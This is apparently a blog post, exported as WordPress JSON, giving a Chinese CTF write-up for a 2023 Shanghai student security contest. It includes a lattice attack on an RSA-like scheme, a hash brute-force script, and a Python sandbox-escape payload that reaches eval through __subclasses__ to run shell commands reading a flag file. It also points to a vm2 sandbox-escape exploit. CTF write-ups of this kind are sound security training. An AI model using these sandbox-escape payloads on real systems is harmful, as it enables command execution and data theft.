{"id":1816,"date":"2023-05-21T13:19:09","date_gmt":"2023-05-21T05:19:09","guid":{"rendered":"https:\/\/fushuling.com\/?p=1816"},"modified":"2023-07-31T14:42:01","modified_gmt":"2023-07-31T06:42:01","slug":"%e7%ac%ac%e5%85%ab%e5%b1%8a%e4%b8%8a%e6%b5%b7%e5%b8%82%e5%a4%a7%e5%ad%a6%e7%94%9f%e7%bd%91%e7%bb%9c%e5%ae%89%e5%85%a8%e5%a4%a7%e8%b5%9b%e6%9a%a8%e7%a3%90%e7%9f%b3%e8%a1%8c%e5%8a%a820","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2023\/05\/21\/%e7%ac%ac%e5%85%ab%e5%b1%8a%e4%b8%8a%e6%b5%b7%e5%b8%82%e5%a4%a7%e5%ad%a6%e7%94%9f%e7%bd%91%e7%bb%9c%e5%ae%89%e5%85%a8%e5%a4%a7%e8%b5%9b%e6%9a%a8%e7%a3%90%e7%9f%b3%e8%a1%8c%e5%8a%a820\/","title":{"rendered":"\u7b2c\u516b\u5c4a\u4e0a\u6d77\u5e02\u5927\u5b66\u751f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b\u66a8\u201c\u78d0\u77f3\u884c\u52a8\u201d2023\uff08\u9996\u5c4a\uff09\u5927\u5b66\u751f\u7f51\u7edc\u5b89\u5168\u9080\u8bf7\u8d5b"},"content":{"rendered":"\n<p>\u54ce\uff0c\u4e00\u5929\u5c31\u6211\u4e00\u4e2a\u4eba\u5728\u6253\uff0c\u961f\u53cb\u7ed9\u529b\u70b9\u5e94\u8be5\u5c31\u664b\u7ea7\u4e86\uff0c\u6c34\u5b50\u54e5\u80cc\u9505\uff0c\u4e0d\u8fc7\u81ea\u5df1\u83dc\u4e5f\u662f\u4e3b\u8981\u539f\u56e0\ud83d\ude04<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">crypto<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">bird<\/h2>\n\n\n\n<p>\u53bb\u5728\u7ebf\u7f51\u7ad9<a href=\"https:\/\/www.dcode.fr\/birds-on-a-wire-cipher\">https:\/\/www.dcode.fr\/birds-on-a-wire-cipher<\/a>\u4e00\u4e2a\u4e00\u4e2a\u5bf9\u7167\uff0c\u6700\u540eflag:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>flag{birdislovely}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">RSA_like<\/h2>\n\n\n\n<p>\u548cmini LCTF 2023\u7684<a href=\"https:\/\/blog.csdn.net\/weixin_52640415\/article\/details\/130547942\">not_RSA<\/a>\u4e00\u6837\u7684<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># sage\nimport random\nfrom Crypto.Util.number import *\nfrom gmpy2 import *\nimport time\n\n############################################\n# 
Config\n##########################################\n\n\"\"\"\nSetting debug to true will display more informations\nabout the lattice, the bounds, the vectors...\n\"\"\"\ndebug = True\n\n\"\"\"\nSetting strict to true will stop the algorithm (and\nreturn (-1, -1)) if we don't have a correct \nupperbound on the determinant. Note that this \ndoesn't necesseraly mean that no solutions \nwill be found since the theoretical upperbound is\nusualy far away from actual results. That is why\nyou should probably use `strict = False`\n\"\"\"\nstrict = False\n\n\"\"\"\nThis is experimental, but has provided remarkable results\nso far. It tries to reduce the lattice as much as it can\nwhile keeping its efficiency. I see no reason not to use\nthis option, but if things don't work, you should try\ndisabling it\n\"\"\"\nhelpful_only = True\ndimension_min = 7  # stop removing if lattice reaches that dimension\n\n\n############################################\n# Functions\n##########################################\n\n# display stats on helpful vectors\ndef helpful_vectors(BB, modulus):\n    nothelpful = 0\n    for ii in range(BB.dimensions()&#91;0]):\n        if BB&#91;ii, ii] >= modulus:\n            nothelpful += 1\n\n    print(nothelpful, \"\/\", BB.dimensions()&#91;0], \" vectors are not helpful\")\n\n\n# display matrix picture with 0 and X\ndef matrix_overview(BB, bound):\n    for ii in range(BB.dimensions()&#91;0]):\n        a = ('%02d ' % ii)\n        for jj in range(BB.dimensions()&#91;1]):\n            a += '0' if BB&#91;ii, jj] == 0 else 'X'\n            if BB.dimensions()&#91;0] &lt; 60:\n                a += ' '\n        if BB&#91;ii, ii] >= bound:\n            a += '~'\n        print(a)\n\n\n# tries to remove unhelpful vectors\n# we start at current = n-1 (last vector)\ndef remove_unhelpful(BB, monomials, bound, current):\n    # end of our recursive function\n    if current == -1 or BB.dimensions()&#91;0] &lt;= dimension_min:\n        return BB\n\n    # we start by 
checking from the end\n    for ii in range(current, -1, -1):\n        # if it is unhelpful:\n        if BB&#91;ii, ii] >= bound:\n            affected_vectors = 0\n            affected_vector_index = 0\n            # let's check if it affects other vectors\n            for jj in range(ii + 1, BB.dimensions()&#91;0]):\n                # if another vector is affected:\n                # we increase the count\n                if BB&#91;jj, ii] != 0:\n                    affected_vectors += 1\n                    affected_vector_index = jj\n\n            # level:0\n            # if no other vectors end up affected\n            # we remove it\n            if affected_vectors == 0:\n                print(\"* removing unhelpful vector\", ii)\n                BB = BB.delete_columns(&#91;ii])\n                BB = BB.delete_rows(&#91;ii])\n                monomials.pop(ii)\n                BB = remove_unhelpful(BB, monomials, bound, ii - 1)\n                return BB\n\n            # level:1\n            # if just one was affected we check\n            # if it is affecting someone else\n            elif affected_vectors == 1:\n                affected_deeper = True\n                for kk in range(affected_vector_index + 1, BB.dimensions()&#91;0]):\n                    # if it is affecting even one vector\n                    # we give up on this one\n                    if BB&#91;kk, affected_vector_index] != 0:\n                        affected_deeper = False\n                # remove both it if no other vector was affected and\n                # this helpful vector is not helpful enough\n                # compared to our unhelpful one\n                if affected_deeper and abs(bound - BB&#91;affected_vector_index, affected_vector_index]) &lt; abs(\n                        bound - BB&#91;ii, ii]):\n                    print(\"* removing unhelpful vectors\", ii, \"and\", affected_vector_index)\n                    BB = BB.delete_columns(&#91;affected_vector_index, ii])\n  
                  BB = BB.delete_rows(&#91;affected_vector_index, ii])\n                    monomials.pop(affected_vector_index)\n                    monomials.pop(ii)\n                    BB = remove_unhelpful(BB, monomials, bound, ii - 1)\n                    return BB\n    # nothing happened\n    return BB\n\n\ndef attack(N, e, m, t, X, Y):\n    modulus = e\n\n    PR.&lt;x,y> = PolynomialRing(ZZ)\n    a = N + 1\n    b = N * N - N + 1\n    f = x * (y * y + a * y + b) + 1\n\n    gg = &#91;]\n    for k in range(0, m + 1):\n        for i in range(k, m + 1):\n            for j in range(2 * k, 2 * k + 2):\n                gg.append(x ^ (i - k) * y ^ (j - 2 * k) * f ^ k * e ^ (m - k))\n    for k in range(0, m + 1):\n        for i in range(k, k + 1):\n            for j in range(2 * k + 2, 2 * i + t + 1):\n                gg.append(x ^ (i - k) * y ^ (j - 2 * k) * f ^ k * e ^ (m - k))\n\n    def order_gg(idx, gg, monomials):\n        if idx == len(gg):\n            return gg, monomials\n\n        for i in range(idx, len(gg)):\n            polynomial = gg&#91;i]\n            non = &#91;]\n            for monomial in polynomial.monomials():\n                if monomial not in monomials:\n                    non.append(monomial)\n\n            if len(non) == 1:\n                new_gg = gg&#91;:]\n                new_gg&#91;i], new_gg&#91;idx] = new_gg&#91;idx], new_gg&#91;i]\n\n                return order_gg(idx + 1, new_gg, monomials + non)\n\n    gg, monomials = order_gg(0, gg, &#91;])\n\n    # construct lattice B\n    nn = len(monomials)\n    BB = Matrix(ZZ, nn)\n    for ii in range(nn):\n        BB&#91;ii, 0] = gg&#91;ii](0, 0)\n        for jj in range(1, nn):\n            if monomials&#91;jj] in gg&#91;ii].monomials():\n                BB&#91;ii, jj] = gg&#91;ii].monomial_coefficient(monomials&#91;jj]) * monomials&#91;jj](X, Y)\n\n    # Prototype to reduce the lattice\n    if helpful_only:\n        # automatically remove\n        BB = remove_unhelpful(BB, monomials, 
modulus ^ m, nn - 1)\n        # reset dimension\n        nn = BB.dimensions()&#91;0]\n        if nn == 0:\n            print(\"failure\")\n            return 0, 0\n\n    # check if vectors are helpful\n    if debug:\n        helpful_vectors(BB, modulus ^ m)\n\n    # check if determinant is correctly bounded\n    det = BB.det()\n    bound = modulus ^ (m * nn)\n    if det >= bound:\n        print(\"We do not have det &lt; bound. Solutions might not be found.\")\n        print(\"Try with highers m and t.\")\n        if debug:\n            diff = (log(det) - log(bound)) \/ log(2)\n            print(\"size det(L) - size e^(m*n) = \", floor(diff))\n        if strict:\n            return -1, -1\n    else:\n        print(\"det(L) &lt; e^(m*n) (good! If a solution exists &lt; N^delta, it will be found)\")\n\n    # display the lattice basis\n    if debug:\n        matrix_overview(BB, modulus ^ m)\n\n    # LLL\n    if debug:\n        print(\"optimizing basis of the lattice via LLL, this can take a long time\")\n\n    BB = BB.LLL()\n\n    if debug:\n        print(\"LLL is done!\")\n\n    # transform vector i &amp; j -> polynomials 1 &amp; 2\n    if debug:\n        print(\"looking for independent vectors in the lattice\")\n    found_polynomials = False\n\n    for pol1_idx in range(nn - 1):\n        for pol2_idx in range(pol1_idx + 1, nn):\n            # for i and j, create the two polynomials\n            PR.&lt;a,b> = PolynomialRing(ZZ)\n            pol1 = pol2 = 0\n            for jj in range(nn):\n                pol1 += monomials&#91;jj](a, b) * BB&#91;pol1_idx, jj] \/ monomials&#91;jj](X, Y)\n                pol2 += monomials&#91;jj](a, b) * BB&#91;pol2_idx, jj] \/ monomials&#91;jj](X, Y)\n\n            # resultant\n            PR.&lt;q> = PolynomialRing(ZZ)\n            rr = pol1.resultant(pol2)\n\n            # are these good polynomials?\n            if rr.is_zero() or rr.monomials() == &#91;1]:\n                continue\n            else:\n                print(\"found 
them, using vectors\", pol1_idx, \"and\", pol2_idx)\n                found_polynomials = True\n                break\n        if found_polynomials:\n            break\n\n    if not found_polynomials:\n        print(\"no independant vectors could be found. This should very rarely happen...\")\n        return 0, 0\n\n    rr = rr(q, q)\n\n    # solutions\n    soly = rr.roots()\n\n    if len(soly) == 0:\n        print(\"Your prediction (delta) is too small\")\n        return 0, 0\n\n    soly = soly&#91;0]&#91;0]\n    ss = pol1(q, soly)\n    solx = ss.roots()&#91;0]&#91;0]\n\n    return solx, soly\n\n\ndef inthroot(a, n):\n    return a.nth_root(n, truncate_mode=True)&#91;0]\n\n\ndef generate_prime(bit_length):\n    while True:\n        a = random.getrandbits(bit_length \/\/ 2)\n        b = random.getrandbits(bit_length \/\/ 2)\n\n        if b % 3 == 0:\n            continue\n\n        p = a ** 2 + 3 * b ** 2\n        if p.bit_length() == bit_length and p % 3 == 1 and isPrime(p):\n            return p\n\n\ndef point_addition(P, Q, mod):\n    m, n = P\n    p, q = Q\n\n    if p is None:\n        return P\n    if m is None:\n        return Q\n\n    if n is None and q is None:\n        x = m * p % mod\n        y = (m + p) % mod\n        return (x, y)\n\n    if n is None and q is not None:\n        m, n, p, q = p, q, m, n\n\n    if q is None:\n        if (n + p) % mod != 0:\n            x = (m * p + 2) * inverse(n + p, mod) % mod\n            y = (m + n * p) * inverse(n + p, mod) % mod\n            return (x, y)\n        elif (m - n ** 2) % mod != 0:\n            x = (m * p + 2) * inverse(m - n ** 2, mod) % mod\n            return (x, None)\n        else:\n            return (None, None)\n    else:\n        if (m + p + n * q) % mod != 0:\n            x = (m * p + (n + q) * 2) * inverse(m + p + n * q, mod) % mod\n            y = (n * p + m * q + 2) * inverse(m + p + n * q, mod) % mod\n            return (x, y)\n        elif (n * p + m * q + 2) % mod != 0:\n            x = (m * 
p + (n + q) * 2) * inverse(n * p + m * q + r, mod) % mod\n            return (x, None)\n        else:\n            return (None, None)\n\n\ndef special_power(P, a, mod):\n    res = (None, None)\n    t = P\n    while a > 0:\n        if a &amp; 1:\n            res = point_addition(res, t, mod)\n        t = point_addition(t, t, mod)\n        a >>= 1\n    return res\n\n\ndef random_padding(message, length):\n    pad = bytes(&#91;random.getrandbits(8) for _ in range(length - len(message))])\n    return message + pad\n\n\n\nc = (59282499553838316432691001891921033515315025114685250219906437644264440827997741343171803974602058233277848973328180318352570312740262258438252414801098965814698201675567932045635088203459793209871900350581051996552631325720003705220037322374626101824017580528639787490427645328264141848729305880071595656587, 73124265428189389088435735629069413880514503984706872237658630813049233933431869108871528700933941480506237197225068288941508865436937318043959783326445793394371160903683570431106498362876050111696265332556913459023064169488535543256569591357696914320606694493972510221459754090751751402459947788989410441472)\nN = 114781991564695173994066362186630636631937111385436035031097837827163753810654819119927257768699803252811579701459939909509965376208806596284108155137341543805767090485822262566517029632602553357332822459669677106313003586646066752317008081277334467604607046796105900932500985260487527851613175058091414460877\ne = 
4252707129612455400077547671486229156329543843675524140708995426985599183439567733039581012763585270550049944715779511394499964854645012746614177337614886054763964565839336443832983455846528585523462518802555536802594166454429110047032691454297949450587850809687599476122187433573715976066881478401916063473308325095039574489857662732559654949752850057692347414951137978997427228231149724523520273757943185561362572823653225670527032278760106476992815628459809572258318865100521992131874267994581991743530813080493191784465659734969133910502224179264436982151420592321568780882596437396523808702246702229845144256038\n\nX = 1 &lt;&lt; 469\nY = 2 * inthroot(Integer(2 * N), 2)\n\nres = attack(N, e, 4, 2, X, Y)\nprint(res)  # gives k and p + q, the rest is easy\n\nb, c = res&#91;1], N\nDsqrt = inthroot(Integer(b ^ 2 - 4 * c), 2)\np, q = (b + Dsqrt) \/\/ 2, (b - Dsqrt) \/\/ 2\nassert p * q == N\nprint(p,q)\n<\/code><\/pre>\n\n\n\n<p>\u6c42\u51fapq\u540e\u5e26\u5165\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># python\nimport random\nfrom Crypto.Util.number import *\nfrom gmpy2 import *\n\nc = (59282499553838316432691001891921033515315025114685250219906437644264440827997741343171803974602058233277848973328180318352570312740262258438252414801098965814698201675567932045635088203459793209871900350581051996552631325720003705220037322374626101824017580528639787490427645328264141848729305880071595656587, 73124265428189389088435735629069413880514503984706872237658630813049233933431869108871528700933941480506237197225068288941508865436937318043959783326445793394371160903683570431106498362876050111696265332556913459023064169488535543256569591357696914320606694493972510221459754090751751402459947788989410441472)\nN = 
114781991564695173994066362186630636631937111385436035031097837827163753810654819119927257768699803252811579701459939909509965376208806596284108155137341543805767090485822262566517029632602553357332822459669677106313003586646066752317008081277334467604607046796105900932500985260487527851613175058091414460877\ne = 4252707129612455400077547671486229156329543843675524140708995426985599183439567733039581012763585270550049944715779511394499964854645012746614177337614886054763964565839336443832983455846528585523462518802555536802594166454429110047032691454297949450587850809687599476122187433573715976066881478401916063473308325095039574489857662732559654949752850057692347414951137978997427228231149724523520273757943185561362572823653225670527032278760106476992815628459809572258318865100521992131874267994581991743530813080493191784465659734969133910502224179264436982151420592321568780882596437396523808702246702229845144256038\np,q=12076532702818803027742169983530419558608401078508017894707093811716696786941308547797368731019670776508448150953432566915232808757060410156378938522359551,9504548564498461029558227822137431209369699669992479992757942960885213061136352518231937836400544570835645335056229054429984730840065504477100420427103027\n\nprint(p*q==N)\n\ndef generate_prime(bit_length):\n    while True:\n        a = random.getrandbits(bit_length \/\/ 2)\n        b = random.getrandbits(bit_length \/\/ 2)\n\n        if b % 3 == 0:\n            continue\n\n        p = a ** 2 + 3 * b ** 2\n        if p.bit_length() == bit_length and p % 3 == 1 and isPrime(p):\n            return p\n\n\ndef point_addition(P, Q, mod):\n    m, n = P\n    p, q = Q\n\n    if p is None:\n        return P\n    if m is None:\n        return Q\n\n    if n is None and q is None:\n        x = m * p % mod\n        y = (m + p) % mod\n        return (x, y)\n\n    if n is None and q is not None:\n        m, n, p, q = p, q, m, n\n\n    if q is None:\n        if (n + p) % mod != 0:\n            x = (m * p + 2) 
* inverse(n + p, mod) % mod\n            y = (m + n * p) * inverse(n + p, mod) % mod\n            return (x, y)\n        elif (m - n ** 2) % mod != 0:\n            x = (m * p + 2) * inverse(m - n ** 2, mod) % mod\n            return (x, None)\n        else:\n            return (None, None)\n    else:\n        if (m + p + n * q) % mod != 0:\n            x = (m * p + (n + q) * 2) * inverse(m + p + n * q, mod) % mod\n            y = (n * p + m * q + 2) * inverse(m + p + n * q, mod) % mod\n            return (x, y)\n        elif (n * p + m * q + 2) % mod != 0:\n            x = (m * p + (n + q) * 2) * inverse(n * p + m * q + r, mod) % mod\n            return (x, None)\n        else:\n            return (None, None)\n\n\ndef special_power(P, a, mod):\n    res = (None, None)\n    t = P\n    while a > 0:\n        if a &amp; 1:\n            res = point_addition(res, t, mod)\n        t = point_addition(t, t, mod)\n        a >>= 1\n    return res\n\n\ndef random_padding(message, length):\n    pad = bytes(&#91;random.getrandbits(8) for _ in range(length - len(message))])\n    return message + pad\n\n# \u8ddfNovelSystem\u7a0d\u6709\u533a\u522b,\u8fd9\u91cc\u53ef\u4ee5\u7b97\u51faphi\u6c42\u51fad,\u89e3\u5bc6\u65b9\u5f0f\u548c\u52a0\u5bc6\u7528\u540c\u4e00\u51fd\u6570\nphi = (p**2 + p + 1)*(q**2 + q + 1)\nd = invert(e,phi)\nm = special_power(c,d,N)\nflag = b''.join(&#91;long_to_bytes(v)&#91;:19] for v in m])\nprint(flag)\n#flag{4872c7e4cc11508f8325f6fb68512a23}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">crackme<\/h2>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-45.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  
loading=\"lazy\" decoding=\"async\" width=\"852\" height=\"361\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-45.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1817\"  sizes=\"auto, (max-width: 852px) 100vw, 852px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">dirty_flag<\/h2>\n\n\n\n<p>python\u591a\u7ebf\u7a0b\u7206\u7834\uff0c\u53ef\u4ee5\u901a\u8fc7leave\u7206\u7834\u5f97\u5230flag\u7684\u5404\u4e2a\u5757<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import hashlib\r\nimport itertools\r\nfrom string import digits\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    tree = &#91;'55cfb0b1cf88f01fc9ed2956a02f90f9014d47ad303dbb52fe7d331ddea37d88',\r\n            'b665a90585127215c576871b867e203e5a00107d11824d34ba2cb5f7c4fd9682',\r\n            '4cac70a760893573e0e5e90f44547e9dc5a53a9f414d36bc24d2d6fd03970ec2',\r\n            '28c372a73cc57472fd1f0e8442115ee2ac53be83800eae6594b8aa9b4c7d48f6',\r\n            '398563820c257329e66a7fffe9e0ce512b54261378dbd329222a7729ca0484fc',\r\n            'a36ac422a339e2b40596b5162b22f89d27a27dbbc8c7292c709a069673eb470b',\r\n            'd35886043eee094a310136ae21c4c7af5bcd7c68e6a547cbd5069dd6baee1a63',\r\n            '41a5f7781dc69308b187e24924e0a0a337cdcc36f06b736dd99810eda7bb867b',\r\n            '41a5f7781dc69308b187e24924e0a0a337cdcc36f06b736dd99810eda7bb867b',\r\n            'a64cd974e0dbd6f6a289ebd2080ffb6e8ac47f794e02cde4db2239c42f63b6ba',\r\n            'e813a50278e41a5ea532c95f99ab616d4ec1ffabad99e1c8fde23886bb600005',\r\n            '8d4bd8d58ddd11cea747d874e676582bb219b065b2989d96b566f0689a3aaff5',\r\n            '8d4bd8d58ddd11cea747d874e676582bb219b065b2989d96b566f0689a3aaff5',\r\n            'e477515e963dc46294e815f9b1887541d225f4b027a7129608302ba8d07faef2',\r\n            
'e477515e963dc46294e815f9b1887541d225f4b027a7129608302ba8d07faef2']\r\n    # flag = &#91;'flag{09xxxxxx', 'xxxx', 'xxxx', 'xxxx', 'xxxxxx755ca2}']\r\n    alpha_bet = digits + 'abcdef'\r\n    strlist = itertools.product(alpha_bet, repeat=6)\r\n\r\n    for i in strlist:\r\n        data = i&#91;0] + i&#91;1] + i&#91;2] + i&#91;3] + i&#91;4] + i&#91;5]\r\n        data_sha = hashlib.sha256(('flag{09' + data).encode('utf-8')).hexdigest()\r\n        data_sha = hashlib.sha256(data_sha.encode('utf-8')).hexdigest()\r\n        if data_sha in tree:\r\n            print(data)\r\n            break\r\n\r\n\r\n    strlist = itertools.product(alpha_bet, repeat=4)\r\n    for i in strlist:\r\n        data = i&#91;0] + i&#91;1] + i&#91;2] + i&#91;3]\r\n        data_sha = hashlib.sha256(data.encode('utf-8')).hexdigest()\r\n        data_sha = hashlib.sha256(data_sha.encode('utf-8')).hexdigest()\r\n        if data_sha in tree:\r\n            print(data)\r\n            print(tree.index(data_sha))\r\n\r\n\r\n    strlist = itertools.product(alpha_bet, repeat=6)\r\n    for i in strlist:\r\n        data = i&#91;0] + i&#91;1] + i&#91;2] + i&#91;3] + i&#91;4] + i&#91;5]\r\n        data_sha = hashlib.sha256((data + '755ca2}').encode('utf-8')).hexdigest()\r\n        data_sha = hashlib.sha256(data_sha.encode('utf-8')).hexdigest()\r\n        if data_sha in tree:\r\n            print(data)\r\n            break\r\n\r\n\r\n\"\"\"\r\n806994\r\n45ef\r\n10\r\n5a04\r\n9\r\nbde0\r\n11\r\nc69658\r\n\"\"\"\r\n# flag{09806994-5a04-45ef-bde0-c69658755ca2}<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">web<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">CookieBack<\/h2>\n\n\n\n<p>\u76f4\u63a5\u8bbf\u95ee\/cookie\u5c31\u6709\u63d0\u793a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-46.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"799\" height=\"244\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-46.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1818\"  sizes=\"auto, (max-width: 799px) 100vw, 799px\" \/><\/div><\/figure>\n\n\n\n<p>\u8981\u6211\u4eec\u5077cookie\uff0c\u4e0d\u8fc7\u5b9e\u9645\u4e0a\u4f60\u4f20\u81ea\u5df1\u7684cookie\u5c31\u884c\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-47-1024x196.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"196\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-47-1024x196.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1819\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">ezpython<\/h2>\n\n\n\n<p>\u7f51\u9875\u91cc\u76f4\u63a5\u53ef\u4ee5\u8ba9\u6211\u4eec\u8fd0\u884cpython\u4ee3\u7801\uff0c\u6240\u4ee5\u76f4\u63a5ssti\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>for i in range(500):\r\n    
res=''\r\n    try:\r\n        res=''.__class__.__bases__&#91;0].__subclasses__()&#91;i].__init__.__globals__&#91;'__bui'+'ltins__']\r\n    except Exception as e:\r\n        pass\r\n    a='e'+'val'\r\n    if a in res:\r\n        print(i)<\/code><\/pre>\n\n\n\n<p>\u5148\u627eeval<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-48-1024x680.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"680\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-48-1024x680.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1820\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u627eflag\u540d\u5b57<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>print(''.__class__.__bases__&#91;0].__subclasses__()&#91;100].__init__.__globals__&#91;'__bui'+'ltins__']&#91;'e'+'val'](\"__im\"+\"port__('o\"+\"s').po\"+\"pen('find -name flag').read()\"))<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-49-1024x422.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" 
decoding=\"async\" width=\"1024\" height=\"422\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-49-1024x422.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1821\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u6700\u540e\u76f4\u63a5cat\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>print(''.__class__.__bases__&#91;0].__subclasses__()&#91;100].__init__.__globals__&#91;'__bui'+'ltins__']&#91;'e'+'val'](\"__im\"+\"port__('o\"+\"s').po\"+\"pen('cat .\/flag').read()\"))<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">easy_node<\/h2>\n\n\n\n<p>\u8c8c\u4f3c\u662f\u4e2anday\uff0c\u53c2\u8003<a href=\"https:\/\/gist.github.com\/leesh3288\/381b230b04936dd4d74aaf90cc8bb244\">https:\/\/gist.github.com\/leesh3288\/381b230b04936dd4d74aaf90cc8bb244<\/a><\/p>\n\n\n\n<p>\u5148\u53bb\/vm2_tester\u63a5\u53e3\u6ce8\u518c\u4e00\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/image3-1024x522.png'><img class=\"lazyload lazyload-style-1\" 